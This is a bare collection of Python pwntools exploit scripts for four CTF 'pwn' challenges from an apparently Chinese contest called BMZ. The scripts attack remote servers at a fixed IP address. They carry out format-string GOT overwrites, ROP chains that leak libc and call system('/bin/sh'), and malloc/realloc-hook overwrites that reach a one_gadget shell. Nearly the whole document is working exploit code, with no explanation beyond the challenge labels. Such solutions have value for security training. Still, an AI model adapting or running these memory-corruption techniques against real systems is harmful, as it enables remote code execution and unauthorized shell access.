BMZ公开赛PWN题

pwn1

exp

#coding=utf-8
from pwn import *
context.log_level="info"
binary="./pwn1"
elf=ELF(binary)
#sh=process(binary)
sh=remote("47.242.59.61",10000)
vuln=0x80486AE

memset_got=elf.got['memset']
sh.recvuntil("e to BMZCTF \n")
payload=fmtstr_payload(10,{
     memset_got:vuln})
sh.sendline(payload)
sh.interactive()

pwn2

exp

#coding=utf-8
from pwn import *
context.log_level="debug"
binary="./pwn2"
elf=ELF(binary)
# sh=process(binary)
sh=remote("47.242.59.61",10001)

check=0x040073C
pop_rdi=0x0000000000400833
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
sh.recvuntil("e you?\n")
# gdb.attach(sh,"b*0x40076C ")
padding="21232F297A57A5A743894A0E4A801FC3\x00"+'a'*23
payload=padding+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(check)
sh.sendline(payload)
puts_addr=u64(sh.recv(6).ljust(8,"\x00"))
libc_base=puts_addr-0x06f6a0
system_addr=libc_base+0x0453a0
bin_sh_addr=libc_base+0x18ce17

payload=padding+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(check)
sh.sendline(payload)
sh.interactive()

pwn3

exp

#coding=utf-8
from pwn import *
context.log_level="debug"
binary="./pwn3"
elf=ELF(binary)
# sh=process(binary)
sh=remote("47.242.59.61",10002)

pop_rdi=0x00040155b
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=0x04013FA 
sh.sendlineafter(">","smsg")
for i in range(70):
	sh.sendlineafter("`->","aaaa")
	sh.sendlineafter("Send?(Y/N)","N")
# gdb.attach(sh,"b*0x4012DE")
payload='a'*17+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
sh.sendlineafter("`->",payload)
sh.sendlineafter("Send?(Y/N)","Y")
sh.recvuntil("Sent.\n")
puts_addr=u64(sh.recv(6).ljust(8,"\x00"))
print "puts"+hex(puts_addr)
libc_base=puts_addr-0x06f6a0
system_addr=libc_base+0x0453a0
bin_sh_addr=libc_base+0x18ce17


sh.sendlineafter(">","smsg")
for i in range(70):
	sh.sendlineafter("`->","aaaa")
	sh.sendlineafter("Send?(Y/N)","N")
# gdb.attach(sh,"b*0x4012DE")
payload='a'*17+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(main)
sh.sendlineafter("`->",payload)
sh.sendlineafter("Send?(Y/N)","Y")

sh.interactive()

pwn4

exp

#coding=utf-8
from pwn import *
context.log_level="info"

binary="./pwn4"
elf=ELF(binary)
# sh=process(binary)
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
sh=remote("47.242.59.61",10003)

def modif(addr,target):
	one_1=int(hex(target)[-4:],16)
	one_2=int(hex(target)[-8:-4],16)
	one_3=int(hex(target)[-12:-8],16)
	change(addr,one_1)
	change(addr+2,one_2)
	change(addr+4,one_3)

def change(addr,target):
	sh.sendafter(" name: ",p64(addr))
	payload="%"+str(target)+"c%12$hn"
	payload+=(32-len(payload))*'a'
	sh.sendafter("e a msg: ",payload)

stack_chk_fail=elf.got['__stack_chk_fail']

sh.sendafter(" name: ",p64(stack_chk_fail))
payload="%17$ p%2420c%12$hn%2422222440c%1"
sh.sendafter("e a msg: ",payload)

#leak libc
libc_start_main=int(sh.recv(15),16)-240
print "libc_start_main:"+hex(libc_start_main)

libc_base=libc_start_main-0x020750
print "libc_base:"+hex(libc_base)
one=[0x45226,0x4527a,0xf0364,0xf1207]
one_gadget=libc_base+one[1]

realloc_hook=libc_base+libc.sym['__realloc_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
realloc=libc_base+libc.sym['realloc']
malloc=libc_base+libc.sym['malloc']
exit_got=elf.got['exit']

print "malloc:"+hex(malloc)
modif(realloc_hook,one_gadget) #
modif(malloc_hook,realloc+0xc)
modif(exit_got,malloc)

#exploit 
# gdb.attach(sh,"b *0x400957")
sh.sendafter(" name: ","fkbugs")
sh.sendafter("e a msg: ","%p")

sh.interactive()